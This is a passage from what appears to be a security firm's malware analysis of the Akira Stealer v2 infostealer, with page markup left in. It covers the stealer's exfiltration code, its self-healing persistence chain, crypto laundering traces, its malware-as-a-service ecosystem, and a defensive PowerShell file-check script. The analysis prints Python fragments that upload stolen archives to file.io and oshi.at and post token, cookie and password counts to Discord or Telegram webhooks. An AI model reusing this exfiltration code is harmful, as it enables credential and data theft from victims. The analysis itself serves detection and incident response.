File.io\n",[7258,23623,23624],{"class":14951,"line":18326},[7258,23625,18405],{},[7258,23627,23628],{"class":14951,"line":18332},[7258,23629,23630],{},"        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n",[7258,23632,23633],{"class":14951,"line":18338},[7258,23634,23635],{},"        return r.json().get('link','')\n",[7258,23637,23638],{"class":14951,"line":18344},[7258,23639,23616],{},[7258,23641,23642],{"class":14951,"line":18350},[7258,23643,23644],{},"    # Oshi.at\n",[7258,23646,23647],{"class":14951,"line":18356},[7258,23648,18405],{},[7258,23650,23651],{"class":14951,"line":18362},[7258,23652,23653],{},"        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n",[7258,23655,23656],{"class":14951,"line":18368},[7258,23657,23658],{},"        return text.split('DL: ')[1].strip()\n",[7258,23660,23661],{"class":14951,"line":18374},[7258,23662,23616],{},[7258,23664,23665],{"class":14951,"line":19040},[7258,23666,23667],{},"    return ''\n",[629,23669,23671],{"id":23670},"_7155-webhook-alerts-attacker-retrieval-analyst-visibility-limits","7.15.5 Webhook Alerts, Attacker Retrieval & Analyst Visibility Limits",[353,23673,14147],{},[353,23675,23676],{},"After uploading the ZIP archive, Akira sends a webhook notification—typically to Discord or Telegram—with a structured embed containing detailed information: number of stolen tokens, cookie count, file size, and a clickable download link. This gives attackers immediate feedback and retrieval access. To ensure reliability, a plaintext fallback message is also sent, containing just the archive link. This redundancy guarantees delivery, even if the embed is blocked by the platform or filtered. From the defender’s perspective, these communications are often invisible unless outbound network monitoring is in place.",[353,23678,23679],{},[433,23680,23681],{},"Embed Notification",[3102,23683,23685],{"className":17754,"code":23684,"language":17756,"meta":402,"style":402},"# Build embed with key metadata\ntoken_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\nfields = [\n    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n]\npayload = {\n    'username':'Akira 💊',\n    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n}\nrequests.post(webhook_url, json=payload, timeout=8)\n",[3724,23686,23687,23692,23697,23702,23707,23712,23717,23722,23727,23731,23736,23741,23746,23750],{"__ignoreMap":402},[7258,23688,23689],{"class":14951,"line":14952},[7258,23690,23691],{},"# Build embed with key metadata\n",[7258,23693,23694],{"class":14951,"line":403},[7258,23695,23696],{},"token_count = len(os.listdir(os.path.join(ROOT, 'Tokens')))\n",[7258,23698,23699],{"class":14951,"line":704},[7258,23700,23701],{},"fields = [\n",[7258,23703,23704],{"class":14951,"line":15337},[7258,23705,23706],{},"    {'name':'🗂️ Archive','value':f'[Download Archive]({download_url})','inline':False},\n",[7258,23708,23709],{"class":14951,"line":13492},[7258,23710,23711],{},"    {'name':'📐 Size','value':f'{os.path.getsize(zip_path)//1024} KB','inline':True},\n",[7258,23713,23714],{"class":14951,"line":15666},[7258,23715,23716],{},"    {'name':'🔑 Tokens','value':str(token_count),'inline':True},\n",[7258,23718,23719],{"class":14951,"line":13493},[7258,23720,23721],{},"    {'name':'🍪 Cookies','value':str(data.cookie_count),'inline':True},\n",[7258,23723,23724],{"class":14951,"line":17117},[7258,23725,23726],{},"    {'name':'🔐 Passwords','value':str(data.password_count),'inline':True},\n",[7258,23728,23729],{"class":14951,"line":17123},[7258,23730,21184],{},[7258,23732,23733],{"class":14951,"line":17369},[7258,23734,23735],{},"payload = {\n",[7258,23737,23738],{"class":14951,"line":18290},[7258,23739,23740],{},"    'username':'Akira 💊',\n",[7258,23742,23743],{"class":14951,"line":18296},[7258,23744,23745],{},"    'embeds':[{'title':'🗄️ Exfiltration Complete','fields':fields}]\n",[7258,23747,23748],{"class":14951,"line":18302},[7258,23749,15669],{},[7258,23751,23752],{"class":14951,"line":18308},[7258,23753,23754],{},"requests.post(webhook_url, json=payload, timeout=8)\n",[367,23756,23757,23763],{},[370,23758,23759,23762],{},[433,23760,23761],{},"Delivery",": Sent to the attacker’s Discord/Telegram channel.",[370,23764,23765,23768,23769,23772],{},[433,23766,23767],{},"Embed Link",": Contains a clickable ",[3724,23770,23771],{},"download_url"," pointing to the ZIP on GoFile (or fallback host).",[353,23774,23775],{},[433,23776,23777],{},"Raw Link Fallback",[3102,23779,23781],{"className":17754,"code":23780,"language":17756,"meta":402,"style":402},"# Ensure attacker always has direct URL, even if embeds fail\nmessage = f\"📥 Archive available at: {download_url}\"\nrequests.post(webhook_url, data={'message': message}, timeout=8)\n",[3724,23782,23783,23788,23793],{"__ignoreMap":402},[7258,23784,23785],{"class":14951,"line":14952},[7258,23786,23787],{},"# Ensure attacker always has direct URL, even if embeds fail\n",[7258,23789,23790],{"class":14951,"line":403},[7258,23791,23792],{},"message = f\"📥 Archive available at: {download_url}\"\n",[7258,23794,23795],{"class":14951,"line":704},[7258,23796,23797],{},"requests.post(webhook_url, data={'message': message}, timeout=8)\n",[367,23799,23800],{},[370,23801,23802,23805],{},[433,23803,23804],{},"Plain Text",": Guarantees delivery of the link in case embeds are blocked or silently dropped.",[353,23807,23808],{},[433,23809,23810],{},"How the Attacker Retrieves the Link",[353,23812,23813,23816],{},[433,23814,23815],{},"1. Webhook Infrastructure","\nThe attacker embeds the webhook endpoint in the malware configuration:",[3102,23818,23820],{"className":17754,"code":23819,"language":17756,"meta":402,"style":402},"# at class initialization\nself.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[3724,23821,23822,23827],{"__ignoreMap":402},[7258,23823,23824],{"class":14951,"line":14952},[7258,23825,23826],{},"# at class initialization\n",[7258,23828,23829],{"class":14951,"line":403},[7258,23830,23831],{},"self.default_webhook = \"%DISCORD_OR_TG_WEBHOOK_URL%\"\n",[367,23833,23834,23841],{},[370,23835,23836,14252,23838],{},[433,23837,14596],{},[3724,23839,23840],{},"https://discord.com/api/webhooks/\u003CWEBHOOK_ID>/\u003CWEBHOOK_TOKEN>",[370,23842,23843,14252,23846],{},[433,23844,23845],{},"Telegram",[3724,23847,23848],{},"https://api.telegram.org/bot\u003CTELEGRAM_TOKEN>/sendMessage",[353,23850,23851,23854],{},[433,23852,23853],{},"2. Real-Time Delivery","\nImmediately after a successful file upload, the malware executes:",[3102,23856,23858],{"className":17754,"code":23857,"language":17756,"meta":402,"style":402},"payload = {\n  'username': 'Akira 💊',\n  'embeds': [{\n      'title': '🗄️ Exfiltration Complete',\n      'fields': [\n          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n      ]\n  }]\n}\n# Transmit the archive URL entirely in the JSON body\nrequests.post(self.default_webhook, json=payload, timeout=8)\n",[3724,23859,23860,23864,23869,23874,23879,23884,23889,23894,23899,23903,23908],{"__ignoreMap":402},[7258,23861,23862],{"class":14951,"line":14952},[7258,23863,23735],{},[7258,23865,23866],{"class":14951,"line":403},[7258,23867,23868],{},"  'username': 'Akira 💊',\n",[7258,23870,23871],{"class":14951,"line":704},[7258,23872,23873],{},"  'embeds': [{\n",[7258,23875,23876],{"class":14951,"line":15337},[7258,23877,23878],{},"      'title': '🗄️ Exfiltration Complete',\n",[7258,23880,23881],{"class":14951,"line":13492},[7258,23882,23883],{},"      'fields': [\n",[7258,23885,23886],{"class":14951,"line":15666},[7258,23887,23888],{},"          {'name': '🗂️ Archive', 'value': f'[Download ZIP]({download_url})'}\n",[7258,23890,23891],{"class":14951,"line":13493},[7258,23892,23893],{},"      ]\n",[7258,23895,23896],{"class":14951,"line":17117},[7258,23897,23898],{},"  }]\n",[7258,23900,23901],{"class":14951,"line":17123},[7258,23902,15669],{},[7258,23904,23905],{"class":14951,"line":17369},[7258,23906,23907],{},"# Transmit the archive URL entirely in the JSON body\n",[7258,23909,23910],{"class":14951,"line":18290},[7258,23911,23912],{},"requests.post(self.default_webhook, json=payload, timeout=8)\n",[367,23914,23915,23923],{},[370,23916,15859,23917,23919,23920,456],{},[3724,23918,23771],{}," variable is interpolated into the embed’s ",[3724,23921,23922],{},"fields.value",[370,23924,23925,23926,23928,23929,15472],{},"For Telegram fallback, the ",[3724,23927,23771],{}," appears in the plain-text ",[3724,23930,13031],{},[353,23932,23933],{},[433,23934,23935],{},"3. EDR & Forensic Visibility Limitations",[367,23937,23938,23947],{},[370,23939,23940,23943,23944,23946],{},[433,23941,23942],{},"No Local Logging",": The malware does not write the ",[3724,23945,23771],{}," to disk or system logs.",[370,23948,23949,23952],{},[433,23950,23951],{},"EDR Blind Spots",": Tools like Microsoft Defender for Endpoint may flag the HTTP request attempt but cannot extract the embedded URL.",[353,23954,23955],{},[433,23956,23957],{},"4. Why the Analyst Cannot Recover This Locally:",[367,23959,23960,23973,23993],{},[370,23961,23962,23965,23966,23968,23969,23972],{},[433,23963,23964],{},"No Local Copy of Link",": The malware writes the ",[3724,23967,23771],{}," only in memory and transmits it over the network; it does ",[748,23970,23971],{},"not"," save this URL to disk or logs.",[370,23974,23975,23978,23979,23981,23986,23987,23989,23990,456],{},[433,23976,23977],{},"Ephemeral Staging Cleanup",": Immediately after upload, the code executes:",[2970,23980],{},[7258,23982,23985],{"className":23983},[23984],"text-monospace","shutil.rmtree(ROOT)",",",[2970,23988],{},"\nerasing all staged artifacts (including any transient text files) from ",[3724,23991,23992],{},"%TEMP%",[370,23994,23995,23998,23999,24002],{},[433,23996,23997],{},"Network-Only Transmission",": Webhook calls (",[3724,24000,24001],{},"requests.post",") occur in-memory; no HTTP logs or browser history entries are created on the victim machine.",[2179,24004,24005],{},[353,24006,24007,24010,24011,24013,24014,24016],{},[433,24008,24009],{},"Implication for Analysts:","\nWithout live packet capture (e.g., network TAP or proxy) at the time of execution, the exact ",[3724,24012,23771],{}," is unrecoverable post-infection.\nAdditionally, the exfiltrated archive is auto-deleted from the hosting service, further reducing the window for forensic retrieval.\nPost-infection imaging or host-based forensic recovery will ",[748,24015,23971],{}," reveal the attacker’s URL or file host credentials, as no artifacts remain locally.",[2559,24018],{"className":24019},[14110,14111],[2548,24021,24023],{"id":24022},"_713-conclusion","7.13 Conclusion",[353,24025,10713],{},[353,24027,24028,24030],{},[3724,24029,13878],{}," (Akira Stealer v2) is a comprehensive, commercially distributed stealer toolkit. It combines extensive targeting, sophisticated anti-analysis, dynamic infrastructure control, and full-stack data theft across credentials, crypto, system profiling, and user files. Its modularity and stealth, combined with rapid reinfection methods, make it one of the most technically advanced stealers observed in active deployment.",[13828,24032,24034],{"id":24033},"_8-circular-execution-chain-a-self-healing-loop","8. Circular Execution Chain: A Self-Healing Loop",[353,24036,9352],{},[353,24038,24039,24040,24043],{},"One of the most technically sophisticated elements of this campaign is its regenerative, circular execution model. Unlike conventional malware with linear stages that flow from dropper to payload and then vanish, this operation was engineered like a ",[433,24041,24042],{},"closed loop"," — where every component watches over the others.",[353,24045,24046,24047,24050],{},"This ",[433,24048,24049],{},"self-healing architecture"," made the infection chain not only persistent, but also autonomous. It could fully recover from partial removals. As long as one piece remained alive, the entire malware ecosystem could reassemble itself.",[2548,24052,24054],{"id":24053},"_81-behavioral-breakdown","8.1 Behavioral Breakdown",[353,24056,10713],{},[5026,24058,24059,24085,24098,24129,24147],{},[370,24060,24061,24066,24068,24069,24072,24073,24075,24076,24078,24079,24081,24082,24084],{},[433,24062,24063,24064,8133],{},"Persistence Anchor (",[3724,24065,13870],{},[3724,24067,13870],{}," acts as the foundational foothold. It is typically dropped into a Windows user startup location, such as ",[3724,24070,24071],{},"%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup",", or registered via ",[3724,24074,14922],{},". Its job is simple but critical: ensure ",[3724,24077,13874],{}," is present and launch it silently during user logon. If ",[3724,24080,13874],{}," is missing, it re-extracts the archive ",[3724,24083,15090],{}," (located in a temp folder or dropped anew), regenerating the full Electron app structure.",[370,24086,24087,24092,24094,24095,24097],{},[433,24088,24089,24090,8133],{},"Bridge Loader (",[3724,24091,13874],{},[3724,24093,13874],{}," is the Electron-wrapped Node.js application. It doesn’t expose any GUI and operates entirely in the background. Upon execution, it runs the embedded JavaScript logic within ",[3724,24096,14326],{},", using Node.js as a runtime environment. This abstraction layer decouples the core logic from the PE stub, helping to evade traditional analysis.",[370,24099,24100,24105,24106,24108,24109],{},[433,24101,24102,24103,8133],{},"Execution Orchestrator (",[3724,24104,16074],{},"\nEmbedded within ",[3724,24107,14326],{},", this is the true controller of the infection chain. Its key functions include:",[367,24110,24111,24117,24120],{},[370,24112,24113,24114,24116],{},"Checking for the presence of ",[3724,24115,13870],{}," and redeploying it if missing",[370,24118,24119],{},"Dynamically injecting runtime configuration: webhook URLs, C2 addresses, tokens",[370,24121,24122,24123,24125,24126,24128],{},"Either invoking the already-present Python payload (",[3724,24124,13878],{},") or downloading it as part of a ZIP bundle (e.g., ",[3724,24127,16138],{},") from attacker-controlled infrastructure",[370,24130,24131,24136,24137,24139,24140,24142,24143,24146],{},[433,24132,24133,24134,8133],{},"Payload Execution (",[3724,24135,13878],{},"\nOnce triggered, ",[3724,24138,13878],{}," executes in memory via ",[3724,24141,13849],{},". It systematically collects saved credentials, cookies, Discord tokens, browser session data, and cryptocurrency wallet extensions. The data is staged in a ZIP archive and exfiltrated via HTTPS — commonly to Discord webhooks, but fallback APIs like ",[3724,24144,24145],{},"gofile.io"," or custom C2 endpoints have also been observed.",[370,24148,24149,24152,24153,24155,24156,24158,24159,24161,24162,24164,24165,24167],{},[433,24150,24151],{},"Loop Integrity and Self-Healing","\nThe design is circular. If ",[3724,24154,13870],{}," is deleted, it will be redeployed. If ",[3724,24157,13874],{}," is missing, ",[3724,24160,13870],{}," re-extracts it from ",[3724,24163,15090],{},". If ",[3724,24166,13878],{}," is deleted, it is re-obtained by the JavaScript layer. This interdependency makes the malware resilient and capable of reconstructing its execution chain from virtually any surviving fragment.",[353,24169,24170,24171,24174],{},"This architecture is not just modular — it’s ",[433,24172,24173],{},"self-sustaining",", deliberately engineered for stealth, flexibility, and long-term survivability in target environments.",[2548,24176,24178],{"id":24177},"_82-why-this-is-noteworthy","8.2 Why This Is Noteworthy",[353,24180,10713],{},[353,24182,24183,24184,456],{},"The campaign’s architectural design reflects a level of sophistication not typically seen in commodity infostealers. It goes beyond simple multi-stage loaders — this is malware engineered for ",[433,24185,24186],{},"operational resilience, stealth, and automation",[353,24188,24189],{},[433,24190,24191],{},"Key Characteristics",[367,24193,24194,24200,24237,24257],{},[370,24195,24196,24199],{},[433,24197,24198],{},"Full Autonomy","\nOnce deployed, the malware requires no user interaction or external reactivation. It acts like a malicious microservice — orchestrating its own persistence, payload execution, and repair routines without external control.",[370,24201,24202,24205,24206],{},[433,24203,24204],{},"Multi-Language Execution Stack","\nThe toolchain integrates:",[367,24207,24208,24217,24223,24229],{},[370,24209,24210,12508,24213,2454,24215,8133],{},[433,24211,24212],{},"PE Binaries",[3724,24214,13870],{},[3724,24216,13874],{},[370,24218,24219,24222],{},[433,24220,24221],{},"Node.js / JavaScript"," (via Electron)",[370,24224,24225,24228],{},[433,24226,24227],{},"PowerShell"," (used for obfuscated payload relay)",[370,24230,24231,12508,24234,24236],{},[433,24232,24233],{},"Python",[3724,24235,13878],{},", executed as memory-resident stealer)\nThis layered composition makes it harder to profile, fingerprint, and analyze using conventional static tools.",[370,24238,24239,24242,24243],{},[433,24240,24241],{},"Defense Evasion by Design","\nEvery component is encoded, encrypted, or dynamically injected:",[367,24244,24245,24248,24251,24254],{},[370,24246,24247],{},"Base64 PowerShell relay",[370,24249,24250],{},"AES-encrypted and GZIP-compressed Python core",[370,24252,24253],{},"Obfuscated JavaScript with runtime token injection",[370,24255,24256],{},"Self-healing behavior that frustrates partial removal",[370,24258,24259,24262,24263,24164,24266,24268,24269,24271],{},[433,24260,24261],{},"No Single Point of Failure","\nThe malware’s self-repair logic ensures that ",[433,24264,24265],{},"removal of a single component is insufficient",[3724,24267,13870],{}," is removed, the info stealer recreates it. If ",[3724,24270,13878],{}," is deleted, it is redownloaded and redeployed by the JavaScript controller.",[353,24273,24274,24275,24278],{},"In short, the malware behaves more like a ",[433,24276,24277],{},"distributed system"," than a typical payload — one that prioritizes survivability, modularity, and stealth.",[353,24280,24281,24282,24285],{},"This elevates the threat from an opportunistic attack to a ",[433,24283,24284],{},"resilient, adaptive platform"," — requiring defenders to match its complexity with equally layered detection and response strategies.",[2548,24287,24289],{"id":24288},"_83-implications-for-blue-teams","8.3 Implications for Blue Teams",[353,24291,10713],{},[353,24293,24294],{},"For defenders and CSOC operators, this kind of architecture raises the bar:",[367,24296,24297,24303,24318],{},[370,24298,24299,24302],{},[433,24300,24301],{},"Partial cleanup is ineffective",". All nodes must be identified and removed simultaneously.",[370,24304,24305,24308,24309,24311,24312,24311,24314,24311,24316,456],{},[433,24306,24307],{},"Defender for Endpoint correlation"," is essential. Analysts must trace full chains: from ",[3724,24310,13870],{}," → ",[3724,24313,14381],{},[3724,24315,14477],{},[3724,24317,13849],{},[370,24319,24320,24323],{},[433,24321,24322],{},"IOC-free persistence"," means memory-based heuristics, telemetry baselining, and chain-based detection are key.",[353,24325,24326,24327,24330],{},"This isn’t just a stealer. It’s a ",[433,24328,24329],{},"resilient malware platform"," — behaving more like a distributed system than a simple threat. And that’s exactly what makes it both impressive and dangerous.",[13828,24332,24334],{"id":24333},"_9-blockchain-tracking-and-analysis","9. Blockchain Tracking and Analysis",[353,24336,9352],{},[2548,24338,24340],{"id":24339},"_91-tracing-fund-distribution-in-a-litecoin-based-malware-campaign","9.1 Tracing Fund Distribution in a Litecoin-Based Malware Campaign",[353,24342,10713],{},[353,24344,24345,24346,24349],{},"During the reverse engineering phase of this malware campaign, we extracted multiple hardcoded wallet addresses used by the stealer for cryptocurrency exfiltration. By following the on-chain activity of these Litecoin wallets, we were able to uncover patterns indicative of deliberate money laundering tactics. The attacker-controlled wallet ",[3724,24347,24348],{},"LW6EopiZ..."," acts as a central aggregation point. Funds stolen from multiple victims are funneled into this address, after which they are rapidly redistributed across multiple new addresses.",[353,24351,24352],{},"The behavior seen here is representative of a classic split-transfer pattern used in crypto tumbling or mixing operations. In each instance, the full incoming balance is divided into two roughly proportional outbound transactions, each sent to a different wallet. This strategy is designed to hinder address clustering and chain tracing by obfuscating the provenance of funds. It’s an effective tactic to evade detection by automated blockchain analytics and threat intelligence platforms.",[353,24354,24355],{},"This laundering behavior leverages a combination of transaction timing, precise value splitting, and address reuse minimization to bypass heuristics commonly applied by clustering algorithms like those used in GraphSense, Chainalysis, or TRM Labs. The overall intent is to create high-entropy transactional flows, which confuse attribution and disrupt linkability, especially when the funds are eventually bridged across other assets or swapped into privacy-focused coins.",[353,24357,24358],{},"In the example below, we show a structured subset of this behavior. The incoming transactions represent distinct victim transfers. These values are then perfectly mapped to outbound flows, showing the coins being \"washed\" through fast, predictable, and algorithmically split payouts.",[8921,24360,8923,24363],{"className":24361,"style":17945},[24362],"font-size-1",[8925,24364,24365,8923,24388,8923,24420,8923,24448,8923,24477],{},[8928,24366,2557,24367,2557,24371,2557,24375,2557,24378,2557,24382,2557,24385,8923],{},[8932,24368,24370],{"style":24369},"text-align: left; width: 14%;","Input Source",[8932,24372,24374],{"style":24373},"text-align: left; width: 12%;","Input Date",[8932,24376,24377],{"style":24369},"Amount In (LTC)",[8932,24379,24381],{"style":24380},"text-align: left; width: 20%;","→ Attacker Wallet",[8932,24383,24384],{"style":19563},"Output Addresses",[8932,24386,24387],{"style":18113},"Total Out (LTC)",[8928,24389,2557,24390,2557,24393,2557,24396,2557,24399,2557,24405,2557,24418,8923],{},[8948,24391,24392],{},"Input_1",[8948,24394,24395],{},"2024-09-21",[8948,24397,24398],{},"0.25339198",[8948,24400,6703,24401,2557],{},[7258,24402,24404],{"title":24403},"LLQtaBnSAFpCFUw5cXRRka7Nvtrs4Up9bH","LLQtaBnSAF...",[8948,24406,24407,24408,24411,24412,24407,24414,24417],{},"\n      - ",[3724,24409,24410],{},"LZmHkgkED..."," (0.15579078, 2024-09-26)",[2970,24413],{},[3724,24415,24416],{},"M8JpDsw5H7..."," (0.09760120, 2024-09-26)\n    ",[8948,24419,24398],{},[8928,24421,2557,24422,2557,24425,2557,24428,2557,24431,2557,24435,2557,24446,8923],{"style":17969},[8948,24423,24424],{},"Input_2",[8948,24426,24427],{},"2024-04-16",[8948,24429,24430],{},"1.09976044",[8948,24432,6703,24433,2557],{},[7258,24434,24404],{"title":24403},[8948,24436,24407,24437,24440,24441,24407,24443,24445],{},[3724,24438,24439],{},"LgWrCAF8ED..."," (0.84304664, 2024-06-13)",[2970,24442],{},[3724,24444,24439],{}," (0.25671380, 2024-06-13)\n    ",[8948,24447,24430],{},[8928,24449,2557,24450,2557,24453,2557,24456,2557,24459,2557,24463,2557,24475,8923],{},[8948,24451,24452],{},"Input_3",[8948,24454,24455],{},"2024-03-06",[8948,24457,24458],{},"0.77089346",[8948,24460,6703,24461,2557],{},[7258,24462,24404],{"title":24403},[8948,24464,24407,24465,24468,24469,24407,24471,24474],{},[3724,24466,24467],{},"LZL3wQcSRP..."," (0.38544673, 2024-03-04)",[2970,24470],{},[3724,24472,24473],{},"M8kiBpVHG3..."," (0.38544673, 2024-03-04)\n    ",[8948,24476,24458],{},[8928,24478,2557,24479,2557,24482,2557,24484,2557,24486,2557,24490,2557,24500,8923],{"style":17969},[8948,24480,24481],{},"Input_4",[8948,24483,24455],{},[8948,24485,24458],{},[8948,24487,6703,24488,2557],{},[7258,24489,24404],{"title":24403},[8948,24491,24407,24492,24468,24495,24407,24497,24474],{},[3724,24493,24494],{},"LUFLTrqYpix...",[2970,24496],{},[3724,24498,24499],{},"La22dfH9eM...",[8948,24501,24458],{},[2559,24503],{"className":24504},[14110,14111],[13828,24506,24508],{"id":24507},"_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","10. Inside the Akira Ecosystem – Commercialized Cybercrime Infrastructure",[353,24510,9352],{},[353,24512,24513],{},"Akira is not just a stealer—it’s the centerpiece of a thriving underground ecosystem designed to simplify, scale, and monetize cybercrime.",[2548,24515,24517],{"id":24516},"_101-a-plug-and-play-ecosystem-for-threat-actors","10.1 A Plug-and-Play Ecosystem for Threat Actors",[353,24519,10713],{},[353,24521,24522],{},"The Akira ecosystem exemplifies the evolution of cybercrime into a professionalized, service-driven economy. It includes:",[367,24524,24525,24534,24540,24546,24552],{},[370,24526,24527,24530,24531,8133],{},[433,24528,24529],{},"Builder Bots"," for on-demand payload generation (e.g., ",[3724,24532,24533],{},"@AkiraRedBot",[370,24535,24536,24539],{},[433,24537,24538],{},"Telegram channels"," for updates, feature requests, and customer support",[370,24541,24542,24545],{},[433,24543,24544],{},"Automated licensing and payment handling",", often via direct messages or anonymous e-commerce platforms like Sellix",[370,24547,24548,24551],{},[433,24549,24550],{},"Bundled modules"," such as clipboard hijackers, Discord token loggers, browser data stealers, and even ransomware add-ons",[370,24553,24554,24557],{},[433,24555,24556],{},"Customizable payloads"," with configuration interfaces allowing toggles, webhook input, and icon branding",[353,24559,24560],{},[356,24561],{"alt":24562,"src":24563},"Akira Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797420/blog/pics/akira-stealer-v2.jpg",[2548,24565,24567],{"id":24566},"_102-commercialization-of-cybercrime","10.2 Commercialization of Cybercrime",[353,24569,10713],{},[353,24571,24572],{},"Akira's structure reflects a broader movement toward \"Malware-as-a-Service\" (MaaS), where:",[367,24574,24575,24581,24587,24593],{},[370,24576,24577,24580],{},[433,24578,24579],{},"No deep technical skill"," is required to launch attacks",[370,24582,24583,24586],{},[433,24584,24585],{},"Low entry costs"," ($75 for 3 months, $150 for lifetime)",[370,24588,24589,24592],{},[433,24590,24591],{},"Instant support and documentation"," through Telegram",[370,24594,24595,24598],{},[433,24596,24597],{},"Community contributions"," regularly extend Akira with scripts and feature suggestions",[353,24600,24601],{},"This ecosystem mirrors legitimate SaaS business models — with changelogs, UX improvements, pricing tiers, and upsells.",[353,24603,24604],{},[356,24605],{"alt":24606,"src":24607},"Akria Stealer","https://res.cloudinary.com/c4a8/image/upload/v1749797061/blog/pics/akira-stealer.jpg",[2548,24609,24611],{"id":24610},"_103-beyond-the-stealer-the-ecosystems-components","10.3 Beyond the Stealer – The Ecosystem's Components",[353,24613,10713],{},[353,24615,14980,24616,24618],{},[3724,24617,13878],{}," is the heart of many attacks, the ecosystem provides a full chain:",[367,24620,24621,24624,24627,24630,24633],{},[370,24622,24623],{},"Obfuscation tools like PyInstaller wrappers",[370,24625,24626],{},"File binders for coupling malicious payloads with benign software",[370,24628,24629],{},"Compilers, crypters, and runtime polymorphism",[370,24631,24632],{},"Hosting mirrors for payload delivery and exfiltration (e.g., GoFile, AnonFiles)",[370,24634,24635],{},"Data management bots that summarize stolen credentials and hardware profiles",[353,24637,24638],{},[356,24639],{"alt":24640,"src":24641},"Akira Bot","https://res.cloudinary.com/c4a8/image/upload/v1749797107/blog/pics/akira-bot.jpg",[13828,24643,24645],{"id":24644},"_11-akira-stealer-quickcheck-affected-files","11. Akira Stealer QuickCheck affected files",[353,24647,9352],{},[2548,24649,24651],{"id":24650},"_111-what-is-this-for","11.1 What Is This For?",[353,24653,10713],{},[353,24655,24656,24657,2454,24660,2454,24663,15448,24666,24668],{},"After a suspected Akira Stealer infection, it's critical to know immediately which files on your system were at risk of exfiltration. The QuickCheck PowerShell script outlined above replicates Akira's exact search logic: it scans the user's ",[433,24658,24659],{},"Desktop",[433,24661,24662],{},"Documents",[433,24664,24665],{},"Downloads",[433,24667,968],{}," folders for files that:",[367,24670,24671,24687,24690],{},[370,24672,24673,24674,2454,24677,2454,24680,24683,24684],{},"Contain sensitive keywords in their filename, such as ",[3724,24675,24676],{},"password",[3724,24678,24679],{},"wallet",[3724,24681,24682],{},"backup",", or ",[3724,24685,24686],{},"token",[370,24688,24689],{},"Have specific extensions commonly targeted (.txt, .docx, .pdf, .jpg, etc.)",[370,24691,24692],{},"Are under the 2 MB size limit imposed by the malware",[353,24694,24695,24696,24699],{},"While QuickCheck offers a rapid overview based on Akira Stealer’s internal logic, ",[433,24697,24698],{},"it is not a substitute"," for comprehensive forensic tools or professional incident response. Always follow up with deeper analysis when dealing with confirmed breaches.",[353,24701,24702,24703,2454,24706,2454,24709,24712,24713,456],{},"It then presents a sorted table of ",[433,24704,24705],{},"Filename",[433,24707,24708],{},"Relative Path",[433,24710,24711],{},"Size (KB)"," and the ",[433,24714,24715],{},"trigger keyword",[2179,24717,24718],{},[353,24719,24720,24723,24724,24727,24728,24730,24731,24734],{},[433,24721,24722],{},"DISCLAIMER","\nThis tool is provided ",[433,24725,24726],{},"“as is”"," without any warranty of completeness or fitness for a particular purpose. It does ",[433,24729,23971],{}," guarantee detection of ",[433,24732,24733],{},"all"," potentially sensitive files, nor does it replace full malware forensics. Use at your own risk.",[2559,24736],{"className":24737},[14110],[2548,24739,24741],{"id":24740},"legal-notice","Legal Notice",[353,24743,10713],{},[353,24745,24746,24747,24750,24751,24754],{},"This QuickCheck Utility is intended for ",[433,24748,24749],{},"defensive security"," assessments only. Any unauthorized scanning or usage on systems you do not own may violate privacy, copyright, or computer misuse laws. glueckkanja AG assumes ",[433,24752,24753],{},"no liability"," for misuse or damages resulting from its use.",[2548,24756,24758],{"id":24757},"powershell-script","PowerShell Script",[353,24760,10713],{},[3102,24762,24764],{"className":14944,"code":24763,"language":14946,"meta":402,"style":402},"\u003C#\n.SYNOPSIS\n    QuickCheck: Lists all files that Akira Stealer would potentially exfiltrate.\n\n.DESCRIPTION\n    Scans Desktop, Documents, Downloads and OneDrive for files that:\n      • Contain one of the defined keywords in their name\n      • Have an allowed file extension\n      • Are not larger than 2 MB\n    Presents the results in a colored, tabular overview.\n\n.NOTES\n    © glueckkanja AG – Kaiserstr. 39 · 63065 Offenbach\n#>\n\n# -------------------------------------\n# 1. Configuration\n# -------------------------------------\n$scanFolders = @(\n    \"$env:USERPROFILE\\Desktop\",\n    \"$env:USERPROFILE\\Documents\",\n    \"$env:USERPROFILE\\Downloads\",\n    \"$env:USERPROFILE\\OneDrive\"\n)\n$keywords   = 'passw','seed','mnemo','phrase','login','wallet','crypto','token','backup','secret','account'\n$extensions = '.txt','.doc','.docx','.pdf','.csv','.xls','.xlsx','.jpg','.png'\n$maxSize    = 2MB\n\n# -------------------------------------\n# 2. Scan and Collect Matches\n# -------------------------------------\n$matches = [System.Collections.Generic.List[PSObject]]::new()\n\nforeach ($folder in $scanFolders) {\n    if (-not (Test-Path $folder)) { continue }\n    Get-ChildItem -Path $folder -Recurse -File -ErrorAction SilentlyContinue | ForEach-Object {\n        # 2.1 Extension filter\n        if ($extensions -notcontains $_.Extension.ToLower()) { return }\n        # 2.2 Size filter\n        if ($_.Length -gt $maxSize) { return }\n\n        # 2.3 Keyword filter: explicit loop to avoid null-method calls\n        $hit = $null\n        foreach ($kw in $keywords) {\n            if ($_.Name.ToLower().Contains($kw)) {\n                $hit = $kw\n                break\n            }\n        }\n        if (-not $hit) { return }\n\n        # 2.4 Build relative path\n        $rel = $_.DirectoryName.Substring($env:USERPROFILE.Length + 1)\n\n        # 2.5 Collect\n        $matches.Add([PSCustomObject]@{\n            FileName    = $_.Name\n            Location    = $rel\n            'Size (KB)' = [math]::Round($_.Length / 1KB, 1)\n            Keyword     = $hit\n        })\n    }\n}\n\n# -------------------------------------\n# 3. Display Results\n# -------------------------------------\nclear\nWrite-Host \"🔍 glueckkanja AG – Akira Stealer QuickCheck\" -ForegroundColor Cyan\nWrite-Host \"────────────────────────────────────────────────────────\" -ForegroundColor DarkCyan\n\nif ($matches.Count -gt 0) {\n    $matches |\n        Sort-Object 